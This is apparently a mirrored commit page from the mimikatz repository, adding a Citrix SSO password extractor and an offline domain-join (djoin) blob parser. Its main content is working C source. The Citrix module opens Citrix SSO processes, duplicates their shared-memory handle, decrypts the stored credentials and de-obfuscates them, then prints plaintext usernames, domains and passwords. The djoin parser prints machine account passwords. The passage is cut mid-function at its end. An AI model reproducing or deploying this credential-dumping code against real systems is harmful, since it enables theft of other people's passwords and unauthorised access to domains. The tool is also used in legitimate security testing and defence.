RepoMirrors
/
mimikatz
mirror of https://github.com/gentilkiwi/mimikatz
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

[legacy] Backport djoin parser & citrix SSO password extractor

This commit is contained in:
Benjamin DELPY 2022-09-19 14:57:55 +02:00
parent a2271237d1
commit 746e2116d1
14 changed files with 1188 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
inc/globals.h
View File

@ -129,3 +129,18 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
#define KULL_M_WIN_MIN_BUILD_10 9800
#define KULL_M_WIN_MIN_BUILD_11 22000
/* mimikatz 3 transition */
#define GET_CLI_ARG(name, var) (kull_m_string_args_byName(argc, argv, name, var, NULL))
#define GET_CLI_ARG_DEF(name, var, def) (kull_m_string_args_byName(argc, argv, name, var, def))
#define GET_CLI_ARG_PRESENT(name) (kull_m_string_args_byName(argc, argv, name, NULL, NULL))
#define kprintf_level(subject, ...) kprintf(L"%*s" subject, level << 1, L"", __VA_ARGS__)
#define kprinthex(lpData, cbData) kull_m_string_wprintf_hex(lpData, (DWORD) cbData, 0); kprintf(L"\n")
#define kprinthex16(lpData, cbData) kull_m_string_wprintf_hex(lpData, (DWORD) cbData, 1 | (16 << 16)); kprintf(L"\n")
#define kull_m_cli_guid(pGuid, bNewLine) kull_m_string_displayGUID(pGuid); if(bNewLine) kprintf(L"\n")
#define kull_m_cli_sid(pSid, bNewLine) kull_m_string_displaySID(pSid); if(bNewLine) kprintf(L"\n")
#define kull_m_crypto_Base64StringToBinary kull_m_string_quick_base64_to_Binary

6
mimikatz/mimikatz.vcxproj
View File

@ -153,6 +153,7 @@
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-drsr_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-efsr_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-nrpc_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-odj.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-pac.c" />
<ClCompile Include="..\modules\kull_m_service.c" />
<ClCompile Include="..\modules\kull_m_string.c" />
@ -213,6 +214,8 @@
<ClCompile Include="modules\kuhl_m_vault.c" />
<ClCompile Include="modules\kuhl_m_minesweeper.c" />
<ClCompile Include="modules\lsadump\kuhl_m_lsadump_dc.c" />
<ClCompile Include="modules\misc\kuhl_m_misc_citrix.c" />
<ClCompile Include="modules\misc\kuhl_m_misc_djoin.c" />
<ClCompile Include="modules\ngc\kuhl_m_ngc.c" />
<ClCompile Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.c" />
<ClCompile Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt6.c" />
@ -273,6 +276,7 @@
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-bkrp.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-efsr.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-nrpc.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-odj.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-pac.h" />
<ClInclude Include="..\modules\kull_m_samlib.h" />
<ClInclude Include="..\modules\kull_m_service.h" />
@ -331,6 +335,8 @@
<ClInclude Include="modules\kuhl_m_vault.h" />
<ClInclude Include="modules\kuhl_m_minesweeper.h" />
<ClInclude Include="modules\lsadump\kuhl_m_lsadump_dc.h" />
<ClInclude Include="modules\misc\kuhl_m_misc_citrix.h" />
<ClInclude Include="modules\misc\kuhl_m_misc_djoin.h" />
<ClInclude Include="modules\ngc\kuhl_m_ngc.h" />
<ClInclude Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.h" />
<ClInclude Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt6.h" />

21
mimikatz/mimikatz.vcxproj.filters
View File

@ -332,6 +332,15 @@
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c">
<Filter>local modules\dpapi\packages</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-odj.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="modules\misc\kuhl_m_misc_djoin.c">
<Filter>local modules\misc</Filter>
</ClCompile>
<ClCompile Include="modules\misc\kuhl_m_misc_citrix.c">
<Filter>local modules\misc</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="mimikatz.h" />
@ -683,6 +692,15 @@
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h">
<Filter>local modules\dpapi\packages</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-odj.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="modules\misc\kuhl_m_misc_djoin.h">
<Filter>local modules\misc</Filter>
</ClInclude>
<ClInclude Include="modules\misc\kuhl_m_misc_citrix.h">
<Filter>local modules\misc</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Filter Include="local modules">
@ -723,6 +741,9 @@
<Filter Include="local modules\ngc">
<UniqueIdentifier>{5880e511-0496-4c66-95c3-39c70baac28b}</UniqueIdentifier>
</Filter>
<Filter Include="local modules\misc">
<UniqueIdentifier>{ca3b8b78-3db9-40c8-8091-438a90e5be4e}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="mimikatz.rc" />

18
mimikatz/modules/kuhl_m_misc.c
View File

@ -30,8 +30,10 @@ const KUHL_M_C kuhl_m_c_misc[] = {
{kuhl_m_misc_spooler, L"spooler", NULL},
{kuhl_m_misc_efs, L"efs", NULL},
{kuhl_m_misc_printnightmare, L"printnightmare", NULL},
{kuhl_m_misc_sccm_accounts, L"sccm", NULL},
{kuhl_m_misc_shadowcopies, L"shadowcopies", NULL},
{kuhl_m_misc_sccm_accounts, L"sccm", NULL},
{kuhl_m_misc_shadowcopies, L"shadowcopies", NULL},
{kuhl_m_misc_djoin_proxy, L"djoin", NULL},
{kuhl_m_misc_citrix_proxy, L"citrix", NULL},
};
const KUHL_M kuhl_m_misc = {
L"misc", L"Miscellaneous module", NULL,
@ -2183,5 +2185,17 @@ NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[])
}
else PRINT_ERROR(L"NtOpenDirectoryObject: 0x%08x\n", status);
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_misc_djoin_proxy(int argc, wchar_t * argv[])
{
kuhl_m_misc_djoin(argc, argv);
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_misc_citrix_proxy(int argc, wchar_t * argv[])
{
kuhl_m_misc_citrix_logonpasswords(argc, argv);
return STATUS_SUCCESS;
}

4
mimikatz/modules/kuhl_m_misc.h
View File

@ -23,6 +23,8 @@
#include <sqlext.h>
#pragma warning(pop)
#include <sqltypes.h>
#include "misc/kuhl_m_misc_djoin.h"
#include "misc/kuhl_m_misc_citrix.h"
const KUHL_M kuhl_m_misc;
@ -50,6 +52,8 @@ NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_djoin_proxy(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_citrix_proxy(int argc, wchar_t * argv[]);
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);

168
mimikatz/modules/misc/kuhl_m_misc_citrix.c Normal file
View File

@ -0,0 +1,168 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kuhl_m_misc_citrix.h"
void kuhl_m_misc_citrix_logonpasswords(int argc, wchar_t* argv[])
{
UNREFERENCED_PARAMETER(argc);
UNREFERENCED_PARAMETER(argv);
kull_m_process_getProcessInformation(Citrix_Each_SSO_Program, NULL);
}
DECLARE_CONST_UNICODE_STRING(_U_ssonsvr, L"ssonsvr.exe");
DECLARE_CONST_UNICODE_STRING(_U_wfcrun32, L"wfcrun32.exe");
DECLARE_CONST_UNICODE_STRING(_U_AuthManSvr, L"AuthManSvr.exe");
const PCUNICODE_STRING _U_CITRIX_SSO_PROGRAMS[] = { &_U_ssonsvr , &_U_wfcrun32 , &_U_AuthManSvr };
BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg)
{
DWORD i, ProcessId;
HANDLE hProcess;
//PKULL_M_MEMORY_HANDLE hMemory;
//KULL_M_MEMORY_ADDRESS aMemory = { NULL, &hMemory };
RTL_USER_PROCESS_PARAMETERS UserProcessParameters;
KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {&UserProcessParameters, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
PEB Peb;
UNREFERENCED_PARAMETER(pvArg);
for (i = 0; i < ARRAYSIZE(_U_CITRIX_SSO_PROGRAMS); i++)
{
if (RtlEqualUnicodeString(_U_CITRIX_SSO_PROGRAMS[i], &pSystemProcessInformation->ImageName, TRUE))
{
ProcessId = PtrToUlong(pSystemProcessInformation->UniqueProcessId);
kprintf(L"\n* %wZ -- pid: %u\n", &pSystemProcessInformation->ImageName, ProcessId);
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_DUP_HANDLE, FALSE, ProcessId);
if(hProcess)
{
if (kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &aRemote.hMemory))
{
if (kull_m_process_peb(aRemote.hMemory, &Peb, FALSE))
{
aRemote.address = Peb.ProcessParameters;
if (kull_m_memory_copy(&aBuffer, &aRemote, sizeof(UserProcessParameters)))
{
aRemote.address = UserProcessParameters.CommandLine.Buffer;
UserProcessParameters.CommandLine.Buffer = LocalAlloc(LPTR, UserProcessParameters.CommandLine.MaximumLength);
aBuffer.address = UserProcessParameters.CommandLine.Buffer;
if(UserProcessParameters.CommandLine.Buffer)
{
if (kull_m_memory_copy(&aBuffer, &aRemote, UserProcessParameters.CommandLine.MaximumLength))
{
Citrix_SSO_Program_args(aRemote.hMemory->pHandleProcess->hProcess, &UserProcessParameters.CommandLine);
}
LocalFree(UserProcessParameters.CommandLine.Buffer);
}
}
}
kull_m_memory_close(aRemote.hMemory);
}
CloseHandle(hProcess);
}
else PRINT_ERROR_AUTO(L"OpenProcess");
break;
}
}
return TRUE;
}
void Citrix_SSO_Program_args(HANDLE hRemoteProcess, PCUNICODE_STRING puCommandLine)
{
int i, argc;
LPWSTR* argv;
HANDLE hRemoteFileMapping = NULL;
argv = CommandLineToArgvW(puCommandLine->Buffer, &argc);
if (argv)
{
if (argc > 0)
{
for (i = 0; i < argc; i++)
{
if (_wcsnicmp(argv[i], L"/HTC:", 5) == 0)
{
hRemoteFileMapping = (HANDLE)(ULONG_PTR)wcstoul(argv[i] + 5, NULL, 10);
Citrix_SSO_Program_FileMapping(hRemoteProcess, hRemoteFileMapping);
break;
}
}
if (!hRemoteFileMapping)
{
kprintf(L" No shared memory (no SSO enabled?)\n");
}
}
else PRINT_ERROR(L"No command/module?");
LocalFree(argv);
}
else PRINT_ERROR_AUTO(L"CommandLineToArgvW");
}
void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMapping)
{
HANDLE hFileMapping;
PCITRIX_PACKED_CREDENTIALS pCitrixPackedCredentials;
PCITRIX_CREDENTIALS pCitrixCredentials;
if (DuplicateHandle(hRemoteProcess, hRemoteFileMapping, GetCurrentProcess(), &hFileMapping, FILE_MAP_READ, FALSE, 0))
{
pCitrixPackedCredentials = MapViewOfFile(hFileMapping, FILE_MAP_READ, 0, 0, sizeof(CITRIX_PACKED_CREDENTIALS));
if (pCitrixPackedCredentials)
{
//kprintf(L"cbStruct: 0x%08x - ref: 0x%08x\ncbData : 0x%08x - ref: 0x%08x\ndwFlags : 0x%08x\n", pCitrixPackedCredentials->cbStruct, sizeof(CITRIX_PACKED_CREDENTIALS), pCitrixPackedCredentials->cbData, sizeof(CITRIX_CREDENTIALS), pCitrixPackedCredentials->dwFlags);
pCitrixCredentials = LocalAlloc(LPTR, sizeof(pCitrixPackedCredentials->Data));
if (pCitrixCredentials)
{
RtlCopyMemory(pCitrixCredentials, pCitrixPackedCredentials->Data, sizeof(pCitrixPackedCredentials->Data));
if (CryptUnprotectMemory(pCitrixCredentials, sizeof(pCitrixPackedCredentials->Data), CRYPTPROTECTMEMORY_CROSS_PROCESS))
{
CitrixPasswordDesobfuscate((PBYTE)pCitrixCredentials->password, pCitrixCredentials->cbPassword);
kprintf(L"| Username : %s\n| Domain : %s\n| Password : %.*s\n| flags/type: 0x%08x\n", pCitrixCredentials->username, pCitrixCredentials->domain, pCitrixCredentials->cbPassword, pCitrixCredentials->password, pCitrixCredentials->dwFlags);
}
else PRINT_ERROR_AUTO(L"CryptUnprotectMemory");
LocalFree(pCitrixCredentials);
}
UnmapViewOfFile(pCitrixPackedCredentials);
}
else PRINT_ERROR_AUTO(L"MapViewOfFile");
CloseHandle(hFileMapping);
}
else PRINT_ERROR_AUTO(L"DuplicateHandle");
}
void CitrixPasswordObfuscate(PBYTE pbData, DWORD cbData)
{
DWORD i;
BYTE prec;
for (i = 0, prec = 0x00; i < cbData; i++)
{
pbData[i] ^= prec ^ 'C';
prec = pbData[i];
}
}
void CitrixPasswordDesobfuscate(PBYTE pbData, DWORD cbData)
{
DWORD i;
BYTE prec, sprec;
for (i = 0, prec = 0x00; i < cbData; i++)
{
sprec = pbData[i];
pbData[i] ^= prec ^ 'C';
prec = sprec;
}
}

37
mimikatz/modules/misc/kuhl_m_misc_citrix.h Normal file
View File

@ -0,0 +1,37 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "../kuhl_m_misc.h"
#include "../../../modules/kull_m_memory.h"
#include "../../../modules/kull_m_process.h"
extern const KUHL_M kuhl_m_misc_citrix;
#pragma pack(push, 4)
typedef struct _CITRIX_CREDENTIALS {
wchar_t username[0x100];
wchar_t domain[0x100];
DWORD cbPassword;
wchar_t password[0x100];
DWORD dwFlags; // type ?
} CITRIX_CREDENTIALS, * PCITRIX_CREDENTIALS;
typedef struct _CITRIX_PACKED_CREDENTIALS {
DWORD cbStruct;
DWORD cbData;
DWORD dwFlags;
BYTE Data[SIZE_ALIGN(sizeof(CITRIX_CREDENTIALS), CRYPTPROTECTMEMORY_BLOCK_SIZE)];
} CITRIX_PACKED_CREDENTIALS, * PCITRIX_PACKED_CREDENTIALS;
#pragma pack(pop)
void kuhl_m_misc_citrix_logonpasswords(int argc, wchar_t* argv[]);
BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
void Citrix_SSO_Program_args(HANDLE hRemoteProcess, PCUNICODE_STRING puCommandLine);
void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMapping);
void CitrixPasswordObfuscate(PBYTE pbData, DWORD cbData);
void CitrixPasswordDesobfuscate(PBYTE pbData, DWORD cbData);

363
mimikatz/modules/misc/kuhl_m_misc_djoin.c Normal file
View File

@ -0,0 +1,363 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kuhl_m_misc_djoin.h"
void kuhl_m_misc_djoin(int argc, wchar_t* argv[])
{
LPCWSTR szInput;
PBYTE pbData, pbDecodedData;
DWORD cbData, cbDecodedData;
if (GET_CLI_ARG(L"input", &szInput))
{
kprintf(L"Input : %s\nOpening : ", szInput);
if (kull_m_file_readData(szInput, &pbData, &cbData))
{
kprintf(L"OK\nDecoding: ");
if (kull_m_crypto_Base64StringToBinary((LPCWSTR)pbData, &pbDecodedData, &cbDecodedData))
{
kprintf(L"OK\n\n");
kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(0, cbDecodedData, pbDecodedData);
LocalFree(pbDecodedData);
}
LocalFree(pbData);
}
}
else PRINT_ERROR(L"An /input:file is needed\n");
}
void kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
{
PODJ_PROVISION_DATA pOdjProvisionData = NULL;
DWORD i;
kprintf_level(L"[ODJ_PROVISION_DATA]");
if (cbBlob && pBlob)
{
kprintf(L"\n");
if (kull_m_rpc_DecodeODJ_PROVISION_DATA(pBlob, cbBlob, &pOdjProvisionData))
{
level++;
kprintf_level(L"ulVersion: %u\n", pOdjProvisionData->ulVersion);
kprintf_level(L"ulcBlobs : %u\n", pOdjProvisionData->ulcBlobs);
for (i = 0; i < pOdjProvisionData->ulcBlobs; i++)
{
kprintf_level(L"[%u] Blob - ulODJFormat: %u (", i, pOdjProvisionData->pBlobs[i].ulODJFormat);
switch (pOdjProvisionData->pBlobs[i].ulODJFormat)
{
case ODJ_WIN7_FORMAT:
kprintf(L"windows 7)\n");
kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(level + 1, pOdjProvisionData->pBlobs[i].cbBlob, pOdjProvisionData->pBlobs[i].pBlob);
break;
case ODJ_WIN8_FORMAT:
kprintf(L"windows 8)\n");
kuhl_m_misc_djoin_OP_PACKAGE_descr(level + 1, pOdjProvisionData->pBlobs[i].cbBlob, pOdjProvisionData->pBlobs[i].pBlob);
break;
default:
kprintf(L"?)\n");
kprinthex16(pOdjProvisionData->pBlobs[i].pBlob, pOdjProvisionData->pBlobs[i].cbBlob);
}
}
kull_m_rpc_FreeODJ_PROVISION_DATA(&pOdjProvisionData);
}
}
else kprintf(L" <empty>\n");
}
void kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
{
PODJ_WIN7BLOB pOdjWin7Blob = NULL;
kprintf_level(L"[ODJ_WIN7BLOB]");
if (cbBlob && pBlob)
{
kprintf(L"\n");
if (kull_m_rpc_DecodeODJ_WIN7BLOB(pBlob, cbBlob, &pOdjWin7Blob))
{
level++;
kprintf_level(L"lpDomain : %s\n", pOdjWin7Blob->lpDomain);
kprintf_level(L"lpMachineName : %s\n", pOdjWin7Blob->lpMachineName);
kprintf_level(L"lpMachinePassword: %s\n", pOdjWin7Blob->lpMachinePassword);
kprintf_level(L"DnsDomainInfo\n");
kprintf_level(L" Name : %wZ\n", &pOdjWin7Blob->DnsDomainInfo.Name);
kprintf_level(L" DnsDomainName: %wZ\n", &pOdjWin7Blob->DnsDomainInfo.DnsDomainName);
kprintf_level(L" DnsForestName: %wZ\n", &pOdjWin7Blob->DnsDomainInfo.DnsForestName);
kprintf_level(L" DomainGuid : ");
kull_m_cli_guid(&pOdjWin7Blob->DnsDomainInfo.DomainGuid, TRUE);
kprintf_level(L" Sid : ");
kull_m_cli_sid(pOdjWin7Blob->DnsDomainInfo.Sid, TRUE);
kprintf_level(L"DcInfo\n");
kprintf_level(L" DomainControllerName : %s\n", pOdjWin7Blob->DcInfo.DomainControllerName);
kprintf_level(L" DomainControllerAddress: %s (DomainControllerAddressType: %u)\n", pOdjWin7Blob->DcInfo.DomainControllerAddress, pOdjWin7Blob->DcInfo.DomainControllerAddressType);
kprintf_level(L" DomainGuid : ");
kull_m_cli_guid(&pOdjWin7Blob->DcInfo.DomainGuid, TRUE);
kprintf_level(L" DomainName : %s\n", pOdjWin7Blob->DcInfo.DomainName);
kprintf_level(L" ForestName : %s\n", pOdjWin7Blob->DcInfo.DnsForestName);
kprintf_level(L" Flags : 0x%08x\n", pOdjWin7Blob->DcInfo.Flags);
kprintf_level(L" DcSiteName : %s\n", pOdjWin7Blob->DcInfo.DcSiteName);
kprintf_level(L" ClientSiteName : %s\n", pOdjWin7Blob->DcInfo.ClientSiteName);
kprintf_level(L"Options : 0x%08x\n", pOdjWin7Blob->Options);
kull_m_rpc_FreeODJ_WIN7BLOB(&pOdjWin7Blob);
}
}
else kprintf(L" <empty>\n");
}
void kuhl_m_misc_djoin_OP_PACKAGE_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
{
POP_PACKAGE pOpPackage = NULL;
kprintf_level(L"[OP_PACKAGE]");
if (cbBlob && pBlob)
{
kprintf(L"\n");
if (kull_m_rpc_DecodeOP_PACKAGE(pBlob, cbBlob, &pOpPackage))
{
level++;
kprintf_level(L"EncryptionType : ");
kull_m_cli_guid(&pOpPackage->EncryptionType, TRUE);
kprintf_level(L"EncryptionContext : 0x%p (%u)\n", pOpPackage->EncryptionContext.pBlob, pOpPackage->EncryptionContext.cbBlob);
kprintf_level(L"WrappedPartCollection :\n");
kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(level + 1, pOpPackage->WrappedPartCollection.cbBlob, pOpPackage->WrappedPartCollection.pBlob);
kprintf_level(L"cbDecryptedPartCollection: %u\n", pOpPackage->cbDecryptedPartCollection);
kprintf_level(L"Extension : 0x%p (%u)\n", pOpPackage->Extension.pBlob, pOpPackage->Extension.cbBlob);
kull_m_rpc_FreeOP_PACKAGE(&pOpPackage);
}
}
else kprintf(L" <empty>\n");
}
void kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
{
POP_PACKAGE_PART_COLLECTION pOpPackagePartCollection = NULL;
DWORD i;
kprintf_level(L"[OP_PACKAGE_PART_COLLECTION]");
if (cbBlob && pBlob)
{
kprintf(L"\n");
if (kull_m_rpc_DecodeOP_PACKAGE_PART_COLLECTION(pBlob, cbBlob, &pOpPackagePartCollection))
{
level++;
kprintf_level(L"cParts : %u\n", pOpPackagePartCollection->cParts);
for (i = 0; i < pOpPackagePartCollection->cParts; i++)
{
kprintf_level(L"[%u] Blob\n", i);
kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(level + 1, pOpPackagePartCollection->pParts + i);
}
kprintf_level(L"Extension: 0x%p (%u)\n", pOpPackagePartCollection->Extension.pBlob, pOpPackagePartCollection->Extension.cbBlob);
kull_m_rpc_FreeOP_PACKAGE_PART_COLLECTION(&pOpPackagePartCollection);
}
}
else kprintf(L" <empty>\n");
}
void kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(DWORD level, POP_PACKAGE_PART pOpPackagePart)
{
kprintf_level(L"[OP_PACKAGE_PART]\n");
level++;
kprintf_level(L"PartType : ");
kull_m_cli_guid(&pOpPackagePart->PartType, FALSE);
if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_JOIN_PROVIDER))
{
kprintf(L" - JOIN_PROVIDER\n");
kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob);
}
else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_JOIN_PROVIDER2))
{
kprintf(L" - JOIN_PROVIDER2\n");
kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob);
}
else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_JOIN_PROVIDER3))
{
kprintf(L" - JOIN_PROVIDER3\n");
kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob);
}
else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_CERT_PROVIDER))
{
kprintf(L" - CERT_PROVIDER\n");
kuhl_m_misc_djoin_OP_CERT_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob);
}
else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_POLICY_PROVIDER))
{
kprintf(L" - POLICY_PROVIDER\n");
kuhl_m_misc_djoin_OP_POLICY_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob);
}
else
{
kprintf(L" - ?\n");
kprinthex16(pOpPackagePart->Part.pBlob, pOpPackagePart->Part.cbBlob);
}
kprintf_level(L"ulFlags : 0x%08x\n", pOpPackagePart->ulFlags);
kprintf_level(L"Extension: 0x%p (%u)\n", pOpPackagePart->Extension.pBlob, pOpPackagePart->Extension.cbBlob);
}
void kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
{
POP_JOINPROV2_PART pOpJoinProv2Part = NULL;
kprintf_level(L"[OP_JOINPROV2_PART]");
if (cbBlob && pBlob)
{
kprintf(L"\n");
if (kull_m_rpc_DecodeOP_JOINPROV2_PART(pBlob, cbBlob, &pOpJoinProv2Part))
{
level++;
kprintf_level(L"dwFlags : 0x%08x\n", pOpJoinProv2Part->dwFlags);
kprintf_level(L"lpNetbiosName : %s\n", pOpJoinProv2Part->lpNetbiosName);
kprintf_level(L"lpSiteName : %s\n", pOpJoinProv2Part->lpSiteName);
kprintf_level(L"lpPrimaryDNSDomain: %s\n", pOpJoinProv2Part->lpPrimaryDNSDomain);
kprintf_level(L"dwReserved : 0x%08x\n", pOpJoinProv2Part->dwReserved);
kprintf_level(L"lpReserved : %s\n", pOpJoinProv2Part->lpReserved);
kull_m_rpc_FreeOP_JOINPROV2_PART(&pOpJoinProv2Part);
}
}
else kprintf(L" <empty>\n");
}
void kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
{
POP_JOINPROV3_PART pOpJoinProv3Part = NULL;
kprintf_level(L"[OP_JOINPROV3_PART]");
if (cbBlob && pBlob)
{
kprintf(L"\n");
if (kull_m_rpc_DecodeOP_JOINPROV3_PART(pBlob, cbBlob, &pOpJoinProv3Part))
{
level++;
kprintf_level(L"Rid : %u\n", pOpJoinProv3Part->Rid);
kprintf_level(L"lpSid: %s\n", pOpJoinProv3Part->lpSid);
kull_m_rpc_FreeOP_JOINPROV3_PART(&pOpJoinProv3Part);
}
}
else kprintf(L" <empty>\n");
}
void kuhl_m_misc_djoin_OP_CERT_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
{
POP_CERT_PART pOpCertPart = NULL;
DWORD i;
kprintf_level(L"[OP_CERT_PART]");
if (cbBlob && pBlob)
{
kprintf(L"\n");
if (kull_m_rpc_DecodeOP_CERT_PART(pBlob, cbBlob, &pOpCertPart))
{
level++;
kprintf_level(L"cPfxStores: %u\n", pOpCertPart->cPfxStores);
for (i = 0; i < pOpCertPart->cPfxStores; i++)
{
kprintf_level(L"[%u] PfxStore\n", i);
kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(level + 1, pOpCertPart->pPfxStores + i);
}
kprintf_level(L"cSstStores: %u\n", pOpCertPart->cSstStores);
for (i = 0; i < pOpCertPart->cSstStores; i++)
{
kprintf_level(L"[%u] SstStore\n", i);
kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(level + 1, pOpCertPart->pSstStores + i);
}
kprintf_level(L"Extension: 0x%p (%u)\n", pOpCertPart->Extension.pBlob, pOpCertPart->Extension.cbBlob);
kull_m_rpc_FreeOP_CERT_PART(&pOpCertPart);
}
}
else kprintf(L" <empty>\n");
}
void kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(DWORD level, POP_CERT_PFX_STORE pPfxStore)
{
kprintf_level(L"[OP_CERT_PFX_STORE]\n");
level++;
kprintf_level(L"pTemplateName : %s\n", pPfxStore->pTemplateName);
kprintf_level(L"ulPrivateKeyExportPolicy: 0x%08x\n", pPfxStore->ulPrivateKeyExportPolicy);
kprintf_level(L"pPolicyServerUrl : %s\n", pPfxStore->pPolicyServerUrl);
kprintf_level(L"ulPolicyServerUrlFlags : 0x%08x\n", pPfxStore->ulPolicyServerUrlFlags);
kprintf_level(L"pPolicyServerId : %s\n", pPfxStore->pPolicyServerId);
kprintf_level(L"pfx : %p (%u)\n", pPfxStore->pPfx, pPfxStore->cbPfx);
}
void kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(DWORD level, POP_CERT_SST_STORE pSstStore)
{
kprintf_level(L"[OP_CERT_SST_STORE]\n");
level++;
kprintf_level(L"StoreLocation: 0x%08x (%s)\n", pSstStore->StoreLocation, kull_m_crypto_system_store_to_name(pSstStore->StoreLocation));
kprintf_level(L"pStoreName : %s\n", pSstStore->pStoreName);
kprintf_level(L"sst : %p (%u)\n", pSstStore->pSst, pSstStore->cbSst);
}
void kuhl_m_misc_djoin_OP_POLICY_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
{
POP_POLICY_PART pOpPolicyPart = NULL;
DWORD i;
kprintf_level(L"[OP_POLICY_PART]");
if (cbBlob && pBlob)
{
kprintf(L"\n");
if (kull_m_rpc_DecodeOP_POLICY_PART(pBlob, cbBlob, &pOpPolicyPart))
{
level++;
kprintf_level(L"cElementLists: %u\n", pOpPolicyPart->cElementLists);
for (i = 0; i < pOpPolicyPart->cElementLists; i++)
{
kprintf_level(L"[%u] ElementsList\n", i);
